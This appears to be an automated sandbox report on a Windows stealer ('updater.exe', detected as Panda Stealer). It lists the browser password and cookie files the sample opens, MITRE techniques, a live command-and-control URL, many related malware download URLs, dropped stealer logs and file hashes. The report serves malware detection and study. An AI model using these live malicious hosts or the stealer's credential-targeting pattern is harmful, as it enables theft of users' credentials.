Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_0140E9B2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_0140E9B2
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_0141337D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_0141337D

Source: C:\Users\user\Desktop\updater.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\updater.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	1_2_0142A932
Source: C:\Users\user\Desktop\updater.exe	Code function: EnumSystemLocalesW,	1_2_0142ABD4
Source: C:\Users\user\Desktop\updater.exe	Code function: EnumSystemLocalesW,	1_2_0142AC1F
Source: C:\Users\user\Desktop\updater.exe	Code function: EnumSystemLocalesW,	1_2_0142ACBA
Source: C:\Users\user\Desktop\updater.exe	Code function: GetLocaleInfoW,	1_2_0142AF96
Source: C:\Users\user\Desktop\updater.exe	Code function: GetLocaleInfoW,	1_2_0142AF98
Source: C:\Users\user\Desktop\updater.exe	Code function: GetLocaleInfoW,	1_2_0142B1C4
Source: C:\Users\user\Desktop\updater.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_0142B0BE
Source: C:\Users\user\Desktop\updater.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	1_2_0142B293
Source: C:\Users\user\Desktop\updater.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoW,	1_2_0140D58A
Source: C:\Users\user\Desktop\updater.exe	Code function: EnumSystemLocalesW,	1_2_0141F7EF

Source: C:\Users\user\Desktop\updater.exe

Code function: 1_2_0140E678 cpuid

1_2_0140E678

Source: C:\Users\user\Desktop\updater.exe

Code function: 1_2_0141FDA7 GetSystemTimeAsFileTime,

1_2_0141FDA7

Source: C:\Users\user\Desktop\updater.exe

Code function: 1_2_01423BF4 _free,GetTimeZoneInformation,_free,

1_2_01423BF4

Source: C:\Users\user\Desktop\updater.exe

Code function: 1_2_013D2F5C GetVersionExA,

1_2_013D2F5C

Stealing of Sensitive Information

Yara detected Panda Stealer

Source: Yara match	File source: updater.exe, type: SAMPLE
Source: Yara match	File source: 1.0.updater.exe.13b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.updater.exe.13b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: updater.exe PID: 2364, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\updater.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Remote Access Functionality

Yara detected Panda Stealer

Source: Yara match	File source: updater.exe, type: SAMPLE
Source: Yara match	File source: 1.0.updater.exe.13b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.updater.exe.13b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: updater.exe PID: 2364, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	Path Interception	Path Interception	1 Virtualization/Sandbox Evasion	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Screen Capture	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	2 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	2 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Man in the Browser	Automated Exfiltration	12 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	2 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	1 Data from Local System	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	34 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
updater.exe	85%	Virustotal		Browse
updater.exe	92%	ReversingLabs	Win32.Trojan.StellarStealer
updater.exe	100%	Avira	HEUR/AGEN.1305371
updater.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://ns.adobe.c/s	0%	URL Reputation	safe
http://ns.adobede	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
f0837288.xsph.ru	141.8.192.151	true	false		high
windowsupdatebg.s.llnwi.net	178.79.225.0	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://f0837288.xsph.ru	false		high
http://f0837288.xsph.ru/collect.php	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	TTFJYWWSOQ.CMMEDGCGG.1.dr	false		high
https://duckduckgo.com/chrome_newtab	TTFJYWWSOQ.CMMEDGCGG.1.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	TTFJYWWSOQ.CMMEDGCGG.1.dr	false		high
http://ns.adobe.c/s	updater.exe, 00000001.00000002.1124428852.000000000018D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	TTFJYWWSOQ.CMMEDGCGG.1.dr	false		high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	TTFJYWWSOQ.CMMEDGCGG.1.dr	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	TTFJYWWSOQ.CMMEDGCGG.1.dr	false		high
https://www.google.com/favicon.ico	TTFJYWWSOQ.CMMEDGCGG.1.dr	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	TTFJYWWSOQ.CMMEDGCGG.1.dr	false		high
http://ns.adobede	updater.exe, 00000001.00000002.1124403437.0000000000026000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
141.8.192.151	f0837288.xsph.ru	Russian Federation		35278	SPRINTHOSTRU	false

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1266489
Start date and time:	2023-07-04 11:17:01 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	3
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	updater.exe
Detection:	MAL
Classification:	mal92.troj.spyw.winEXE@1/5@1/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Successful, ratio: 99% Number of executed functions: 90 Number of non-executed functions: 145
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Excluded IPs from analysis (whitelisted): 173.222.108.210, 173.222.108.226
Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
141.8.192.151	ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe	Get hash	malicious	Azorult	Browse	f0355889.xsph.ru/Panel/index.php
	gOKMPhOLiN.exe	Get hash	malicious	Phoenix Miner, ccminer	Browse	f0758246.xsph.ru//zima.php?mine=ETC
	DWG Material, Standard BS 4360 GR. 40A43A.jar	Get hash	malicious	Unknown	Browse	f0719949.xsph.ru/dropbox.exe
	DWG Material, Standard BS 4360 GR. 40A43A.jar	Get hash	malicious	Unknown	Browse	f0719949.xsph.ru/dropbox.exe
	dropbox.exe	Get hash	malicious	Unknown	Browse	f0719949.xsph.ru/Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh
	DWG spare parts 455RTMGF Model.exe	Get hash	malicious	Remcos	Browse	f0719949.xsph.ru/Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh
	NotaFiscal.msi	Get hash	malicious	Unknown	Browse	f0717271.xsph.ru/serv.php
	Revised sales contract for Crosswear.rtf	Get hash	malicious	Snake Keylogger	Browse	f0705964.xsph.ru/mum.exe
	cxbqjWw79R.exe	Get hash	malicious	Xmrig	Browse	f0702521.xsph.ru/cmd.php?hwid=computer%5Cuser&gpuname=88P9A4OS;%20&mining=1&active=XMR
	IVBPFW.exe	Get hash	malicious	Unknown	Browse	f0702055.xsph.ru/ng.txt
	NOPL-25-JULY-001.doc	Get hash	malicious	Remcos	Browse	f0699262.xsph.ru/letter.exe
	300618c6e81ee458a3aba4188f0f24937f62974991428.exe	Get hash	malicious	RedLine, Remcos, Xmrig	Browse	f0699616.xsph.ru/RATTCRYPT.exe
	http://f0688845.xsph.ru/index.php	Get hash	malicious	Unknown	Browse	f0688845.xsph.ru/favicon.ico
	18561381.exe	Get hash	malicious	RedLine	Browse	f0645594.xsph.ru/build.exe
	bd250e1cb4f8d322a5464549dc067ac7bcbecfc2d4fca.exe	Get hash	malicious	RedLine Remcos Xmrig	Browse	f0641877.xsph.ru/lam1di.exe
	9WPRwZwY47.exe	Get hash	malicious	RedLine	Browse	f0624763.xsph.ru/MicrosoftApi.exe
	2a09Y5NsoG.exe	Get hash	malicious	Amadey RedLine SmokeLoader Tofsee Vidar	Browse	f0611101.xsph.ru/1.exe
	NFe_09112021123.msi	Get hash	malicious	Hidden Macro 4.0	Browse	f0589562.xsph.ru//arqvs//zlibai.dll
	VapeV4Installer (2).exe	Get hash	malicious	Unknown	Browse	f0587499.xsph.ru/dop.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
windowsupdatebg.s.llnwi.net	Mitsubishi_PO_2_2023,_Colombo_02.exe	Get hash	malicious	AgentTesla	Browse	95.140.230.192
	payment_copy$10,200.exe	Get hash	malicious	AgentTesla, NSISDropper	Browse	95.140.230.128
	GJMyNZWtW94DfXw.exe	Get hash	malicious	AgentTesla	Browse	95.140.230.192
	Ql697IjuB0.exe	Get hash	malicious	Amadey, SmokeLoader	Browse	95.140.230.128
	CcsplKLNUD.exe	Get hash	malicious	RedLine	Browse	178.79.225.128
	103603-81075327-LBP23103603039.pdf.exe	Get hash	malicious	AgentTesla	Browse	178.79.225.0
	SALE_ORDER_30062023.exe	Get hash	malicious	AgentTesla	Browse	95.140.230.128
	SOA_50970351.exe	Get hash	malicious	AgentTesla	Browse	178.79.225.128
	u8F8Ukww3S.exe	Get hash	malicious	CobaltStrike, Metasploit, ReflectiveLoader	Browse	178.79.225.0
	303629.exe	Get hash	malicious	CobaltStrike	Browse	178.79.225.0
	file.exe	Get hash	malicious	RedLine, zgRAT	Browse	95.140.230.128
	file.exe	Get hash	malicious	AgentTesla	Browse	95.140.230.192
	TT_PAYMENT.exe	Get hash	malicious	AgentTesla	Browse	95.140.230.128
	SALE_ORDER_30062023.exe	Get hash	malicious	AgentTesla	Browse	178.79.225.128
	INVOICE_PAYMENT_COPY_pdf.exe	Get hash	malicious	AgentTesla	Browse	95.140.230.128
	FjW0ESmeMr.exe	Get hash	malicious	RedLine	Browse	95.140.230.128
	Payment_Slip_For_Bank_Transfer.exe	Get hash	malicious	AgentTesla	Browse	178.79.225.0
	file.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	95.140.230.192
	decode_5822a45e3f842d6ba3c92b21f88e942ff13b8cd571826188b7ad85771882f5e3.exe	Get hash	malicious	AsyncRAT	Browse	95.140.230.192
	decode_0b4d10612b33e871a7943747ea7063a884b3a9fe25cb1df3eb7a493afb175272.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	95.140.230.192

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SPRINTHOSTRU	al7OvZOSKy.exe	Get hash	malicious	DCRat	Browse	141.8.197.42
	1iakzzaLRr.exe	Get hash	malicious	DCRat	Browse	141.8.197.42
	HEUR-Backdoor.MSIL.LightStone.gen-8e6d8d43b27.exe	Get hash	malicious	DCRat	Browse	141.8.197.42
	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Get hash	malicious	BlackNET	Browse	141.8.197.42
	http://f0827197.xsph.ru/000/0101/battle/?login=john.gdoe@arcadia.io	Get hash	malicious	Unknown	Browse	141.8.192.151
	acctspay ACH_INSTRUCTIONSpdf.shtml	Get hash	malicious	Unknown	Browse	141.8.192.169
	file.exe	Get hash	malicious	Tofsee	Browse	185.185.68.207
	rskovbrand.exe	Get hash	malicious	FormBook, GuLoader	Browse	141.8.192.93
	7SzUgdO8Ne.exe	Get hash	malicious	FormBook, GuLoader	Browse	141.8.192.93
	Archd.exe	Get hash	malicious	FormBook, GuLoader	Browse	141.8.192.93
	file.exe	Get hash	malicious	Tofsee	Browse	141.8.195.197
	Y0VyFqYj2i.exe	Get hash	malicious	Tofsee	Browse	141.8.195.197
	5zZPgwyy8n.exe	Get hash	malicious	Tofsee	Browse	141.8.195.197
	vk8Xlb1vw3.exe	Get hash	malicious	Tofsee	Browse	141.8.195.197
	file.exe	Get hash	malicious	Tofsee	Browse	141.8.195.197
	file.exe	Get hash	malicious	Amadey, Fabookie, PrivateLoader, RedLine, Tofsee	Browse	185.185.70.73
	Gardenizes.exe	Get hash	malicious	FormBook, GuLoader	Browse	141.8.192.93
	ufuldkommenhederne.exe	Get hash	malicious	FormBook, GuLoader	Browse	141.8.192.93
	file.exe	Get hash	malicious	Tofsee	Browse	185.185.70.73

Process:	C:\Users\user\Desktop\updater.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1655906
Entropy (8bit):	7.869590651791305
Encrypted:	false
SSDEEP:	24576:wFKC89ItI18Hu7YtxBxJ4CMbsJi9QseA9RXILPhCy1fkAhNdgstcl46MPpjq00fm:095OiFzbMmLaRXGPcyHhNdttccPlN0fm
MD5:	D023FF70A46797EA3435EF0B1F0487D3
SHA1:	98AF68749BE9B55062C9810856722AF0D2B28DAE
SHA-256:	168EDA3C0D120F111BFE8E23A7C8DFEF84BBE6505D88ED20C16E3D76E3357307
SHA-512:	5DC77B760E7B13C5E42C2FBB06CA35284008343F31510D5244B67D883F01F46FD3B28B27DA7465BE9C6FA352951C3CCF310C3192C79AC3DDC7A3F9E32831C295
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...fE...}N'D.Q.....N.......s.#Q..D1`B...(.t.......&..M.nrNJF@rF]..[.V...p.A..y...ZU{._c...S..:.6<..1..p9.91. .7<.Fq[.&..6.9h'....O.20.4k........^rFMX.5.9...p.......]O)s..I.>.:.......`.I.%4z...h\b....O.Sc.d.=..Lq.)....S.~...{@.`....~....n....cxl...NC......7...n..XV.7..u...y^7l..:......=.[w...q....7...y..y=f.F..p-.9v....I[...g#......b.e4..[...R....m..r._"k.y.....T..5cf........\|~6.....l.3...V`..Vn.e..V..k.1..z%.5.k!.kh.j..7....'}..V.v.....1E..\| .]......f>_c....\|.....z%]C..$]..V.3.....p.h=..c,1......1...\.w.Sc...h.....v...v9'_'.s...h..}.+..\|.....>.skX..}du..gx...i..r=..\>[.u.CN.MF#.\|...rv......m.X...z`nb.....yM...9...c}.2.b.rF6..p.270...1....f....c4..gi\|4.-.=...=..z....98......Zq...9.......gr.F.q{L.a..q..3....<...Gs.c..~9>z.9...i.Th%6.Hn....0G.D.#..\..4.5.'.8.k.'.t.u.....R.r.X^.n<.0..F...o0..S.U&...[.5...e.!.o=..........O<Hj..B.D....:\'...N8.+2....

C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEE\LIVVLE.BYWLLNHYGV

Download File

Process:	C:\Users\user\Desktop\updater.exe
File Type:	ASCII text, with very long lines (690)
Category:	dropped
Size (bytes):	1401
Entropy (8bit):	5.0777728481751625
Encrypted:	false
SSDEEP:	24:JLWmPFn+wnlqc8jlwVs3sI2GPfQQttE6sC63tpsC63tGEpDVD:9dlqc8joE2QB1B6nB6UMD
MD5:	C4EF4F766ADD2492805FA188B0D4589D
SHA1:	E01A63D81464C41507E6C08092AEB512D040B3F4
SHA-256:	545570454417671F0DC0A5F67BEB7495FB4329EFCFFEFEDF4AC092D3C13DE327
SHA-512:	6EABC640538BEA2DC27DAAA0A06E75A36B99DC2FD5695D41C5C9F612D48181FB65539B6A1EC2124239824E95C6171809F962F6B2AB8419FA9643A5A594B807D9
Malicious:	false
Reputation:	low
Preview:	www.mozilla.org.FALSE./.0.1510052761.moz-notification-fx-out-of-date.fx-out-of-date-banner..mozilla.org.FALSE./.0.1823598364.optimizelyEndUserId.oeu1508238364462r0.17947700943881573..mozilla.org.FALSE./.0.1823598364.optimizelySegments.%7B%22245617832%22%3A%22none%22%2C%22245677587%22%3A%22ff%22%2C%22245875585%22%3A%22direct%22%2C%22246048108%22%3A%22false%22%7D..246059135.log.optimizely.com.FALSE./.0.1823598366.end_user_id.oeu1508238364462r0.17947700943881573..mozilla.org.FALSE./.0.1823598366.optimizelyBuckets.%7B%7D..mozilla.org.FALSE./.0.1508238381.optimizelyPendingLogEvents.%5B%22n%3Doptly_activate%26u%3Doeu1508238364462r0.17947700943881573%26wxhr%3Dtrue%26time%3D1508238364.494%26f%3D8540095929%2C8784714594%26g%3D%22%2C%22n%3Dhttps%253A%252F%252Fwww.mozilla.org%252Fen-US%252Ffirefox%252F52.0.1%252Ffirstrun%252F%253Ff%253D102%26u%3Doeu1508238364462r0.17947700943881573%26wxhr%3Dtrue%26time%3D1508238364.446%26f%3D8540095929%2C8784714594%26g%3D859230343%22%2C%22n%3Dhttps%253A%252F%252Fw

C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEE\LODKMBCQWBJDLWJIJSMI.FEGI

Download File

Process:	C:\Users\user\Desktop\updater.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	742
Entropy (8bit):	4.525356477602935
Encrypted:	false
SSDEEP:	12:SxPrJi2YSCqTR/Us/5xcIx4GmsD8UzmHZEgX59i91M:KPV/YueixcIx4GmsDL6FX59iI
MD5:	723DF53F07B53D015354CAC195DB3535
SHA1:	808DFCF03285475EEDE8D3F415C0A8B8AFCD83CB
SHA-256:	A3FB68DD23FCFD77774B25B3D37C184428A6C8BD5ACA6245E64691E1F8E17B6F
SHA-512:	92AD81881F09E88593A7E713657D7D0C5A03E72E03D9EAB095129F8665D0F5C1DA3AA260F605F86B4ED90C4A104B9CDBA7983147F8FE0627581FC0B627CB3D94
Malicious:	false
Reputation:	low
Preview:	System hash: b4c8ac298ecd13471647646125ed843d.Build: 1029702468.Version: 1.11.Build name: @traffer.----------------------------------------------------.[BETA BUILD v1.11] COLLECTOR PROJECT.----------------------------------------------------..System: Windows 7 (x64)..AutoFill: 0.Passwords: 0.Cookies: 9.Cards: 0..Atomic: -.Armory: -.Bytecoin: -.BitcoinCore: -.DashCore: -.Litecoin: -.Electrum: -.Zcash: -.Ethereum: -..Authy (2FA): -.Files: 8.FileZilla: -.NordVPN: -.Telegram: -.Discord: -.PSI: -.Wallet: -.Pidgin: -.Steam: -...----------------------------------------------------.Startup path: C:\Users\user\Desktop\updater.exe.Start time: Tue Jul 4 11:18:01 2023.Get log time: 3 sec..----------------------------------------------------..

C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEE\QFJBXSKPEM.WQRIPFTOG

Download File

Process:	C:\Users\user\Desktop\updater.exe
File Type:	SQLite 3.x database, user version 7, last written using SQLite version 3024000, page size 32768, file counter 5, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	524288
Entropy (8bit):	0.08108430995212909
Encrypted:	false
SSDEEP:	48:De8rmWT8cl+fpNDId7r+gUEl1B6nB6UnUqc8AqwIhY5wXwwAVshT:DeUm7ii+7Ue1AQ98VVY
MD5:	2B9F6CFC2BFEAD36B3B619A65FD9759C
SHA1:	78B8225E9B528E5A5EA35EB1649CBDB334A44A3C
SHA-256:	E6C938035A1B57C0A47FB3B55797B6BFA056CC62360F4893F31D8F39102368D4
SHA-512:	97A3B2B689C33502FB25DE2CE42AE4F5F0260F7679A8E36D16782D2775A5BB28B7BC03B0814F5E588C133EB95F6E0E2CA0BD2E7BBCB4838FB29BDEF855D5E9F7
Malicious:	false
Reputation:	low
Preview:	SQLite format 3......@ ..........................................................................$......}..~...}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEE\TTFJYWWSOQ.CMMEDGCGG

Download File

Process:	C:\Users\user\Desktop\updater.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 4, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	77824
Entropy (8bit):	1.1340767975888557
Encrypted:	false
SSDEEP:	96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
MD5:	9A38AC1D3304A8EEFD9C54D4EADCCCD6
SHA1:	56E953B2827B37491BC80E3BFDBBF535F95EDFA7
SHA-256:	67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
SHA-512:	32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.7660386658610205
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	updater.exe
File size:	698'280 bytes
MD5:	5b7111ae32c04c641c56e81a6293ec48
SHA1:	77331d9725c41635d6d449414c8a0d4ee00fac63
SHA256:	4cedab343fc4581149b13b7f6fd6532fa2c437550dee42926b37a93c6b5997f9
SHA512:	d7d9c38e7e909e057c64c091e33cc118df3b7503e11345919613462ed006d91f8b5c8e302b599fb740cb55eb3a4c030fbf5ed5febdb4c2e83752325f26124e78
SSDEEP:	12288:VoJqNIPtNmO6IOOEp0TMlja7NRl2PSVikIyoyueh+AkHcnLwuukoCOD6zlijOz+2:VoJEKZ6IEGTMxapRl2PSwHTehy6B1+p4
TLSH:	93E4C033F0C2C07ED0321032596CEB6259BFF9320A25499BA3C4156E9FB57D29E3665B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`..P$...$...$.......4...............0.......8.......%.......u.......3.......)...$...........&.......%...Rich$..................

File Icon


Icon Hash:	aaf3e3e3918382a0

Static PE Info

General

Entrypoint:	0x45e27e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x5FCCE7D9 [Sun Dec 6 14:16:57 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2a908babc5cc3af850e078751d7de0e9

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	3/4/2020 10:39:47 AM 3/3/2021 10:39:47 AM
Subject Chain	CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version:	3
Thumbprint MD5:	AAEE394B1087AC1044A13D09468CDF1E
Thumbprint SHA-1:	2485A7AFA98E178CB8F30C9838346B514AEA4769
Thumbprint SHA-256:	C0772D3C9E20C3F4EBB09F5816D6DADA0D8FA86563C2D68898539EC1CD355A1B
Serial:	3300000187721772155940C709000000000187

Entrypoint Preview

Instruction
call 00007F49E88373A3h
jmp 00007F49E8836BF9h
cmp ecx, dword ptr [004A2014h]
jne 00007F49E8836D85h
ret
jmp 00007F49E88374C7h
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
mov ecx, dword ptr [ebp-10h]
xor ecx, ebp
call 00007F49E8836D55h
jmp 00007F49E8836D60h
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [004A2014h]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [004A2014h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
